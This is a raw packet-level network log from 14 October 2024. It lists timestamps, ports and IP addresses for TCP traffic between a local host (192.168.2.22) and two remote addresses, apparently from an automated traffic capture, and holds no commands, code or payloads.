                                                                                                                                                                              Oct 14, 2024 11:06:05.929642916 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:05.929642916 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:05.993226051 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.260272980 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.260272980 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.260282993 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.260296106 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.260329962 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.260374069 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.260374069 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.260374069 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.260382891 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.260426044 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.260564089 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.260593891 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.260649920 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.260649920 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.260658026 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.260688066 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.283323050 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.283358097 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.283452988 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.283485889 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.283499002 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.283499002 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.283499002 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.283514023 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.283725023 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.283752918 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.283771992 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.283771992 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.283771992 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.283786058 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.283809900 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.283809900 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.284013033 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.284044981 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.284070969 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.284070969 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.284080029 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.284209967 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.284210920 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.350624084 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.350661039 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.350866079 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.350898981 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.350907087 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.350907087 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.350934029 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.351006031 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.351006031 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.351172924 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.351198912 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.351222038 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.351222038 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.351244926 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.351393938 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.351393938 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.351393938 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.351490021 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.351519108 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.351562977 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.351562977 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.351562977 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.351572037 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.351603031 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.372056007 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.372100115 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.372241974 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.372270107 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.372288942 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.372288942 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.372288942 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.372303009 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.372467995 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.372499943 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.372546911 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.372546911 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.372546911 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.372559071 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.372752905 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.372781038 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.374244928 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.374244928 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.374257088 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.391189098 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.411955118 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.412127972 CEST4917180192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:06.439513922 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.439555883 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.439642906 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.439681053 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.439707041 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.439707041 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.439707041 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.439723015 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.439850092 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.439925909 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.439954996 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.440021992 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.440021992 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.440038919 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.440293074 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.440325022 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.440368891 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.440378904 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.440457106 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.442725897 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.461119890 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.461154938 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.461215973 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.461222887 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.461222887 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.461239100 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.461258888 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.461267948 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.797331095 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.797331095 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.797331095 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.797341108 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.797595978 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.798660040 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.799159050 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.799186945 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.799217939 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.799222946 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.799400091 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.802994013 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.817361116 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.817395926 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.817564964 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.817595005 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.817625999 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.817625999 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.817626953 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.817640066 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.817724943 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.818351030 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.818376064 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.819025993 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.819025993 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.819035053 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.820230007 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.820257902 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.820300102 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.820307970 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.821209908 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.822240114 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.884579897 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.884608984 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.884685993 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.884685993 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.884685993 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.884699106 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.885565042 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.885595083 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.885627031 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.885636091 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.885653973 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.885982037 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.886035919 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.886065960 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.886149883 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.886149883 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.886157036 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.886243105 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.888034105 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.888061047 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.888089895 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.888103962 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.888145924 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.906366110 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.906394958 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.906471968 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.906471968 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.906471968 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.906483889 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.906555891 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.906584978 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.906610012 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.906610012 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.906615973 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.906625986 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.906790018 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.907582998 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.907609940 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.907669067 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.907675028 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.907793045 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.909324884 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.909357071 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.909559011 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.909559011 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.909567118 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.973480940 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.973509073 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.973604918 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.973635912 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.974478006 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.974504948 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.974534035 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.974545956 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.974564075 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.974837065 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.974858999 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.974889994 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.974905968 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.974934101 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.976897955 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.976924896 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.977109909 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.977109909 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.977118015 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.995281935 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.995304108 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.995348930 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.995388985 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.995404005 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.995404005 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.995413065 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.995428085 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.995471001 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.995932102 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.995953083 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.995999098 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.996006966 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.996016979 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:06.998111010 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:06.998138905 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:07.350573063 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:07.350585938 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:07.350615978 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:07.351073980 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:07.351104021 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:07.351139069 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:07.351150990 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:07.351166010 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:07.351723909 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:07.351748943 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:07.351777077 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:07.351785898 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:07.351802111 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:07.353694916 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:07.353730917 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:07.353754997 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:07.353765011 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:07.353811026 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:07.353811026 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:07.381498098 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:07.417572975 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:07.417614937 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:07.417896032 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:07.417907953 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:07.426244020 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:07.426270008 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:07.426310062 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:07.426321983 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:07.426340103 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:07.426599026 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:07.426620960 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:07.426667929 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:07.426676989 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:07.426688910 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:07.426872969 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:07.426902056 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:07.426928997 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:07.426937103 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:07.426956892 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:07.439477921 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:07.439508915 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:07.439573050 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:07.439584970 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:07.439796925 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:07.439825058 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:07.439853907 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:07.439873934 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:07.439901114 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:07.440520048 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:07.440541983 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:07.440579891 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:07.440587997 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:07.440609932 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:07.442604065 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:07.442630053 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:07.442660093 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:07.442667007 CEST44349167185.199.108.133192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:07.442698956 CEST49167443192.168.2.22185.199.108.133
                                                                                                                                                                              Oct 14, 2024 11:06:07.468067884 CEST49167443192.168.2.22185.199.108.133
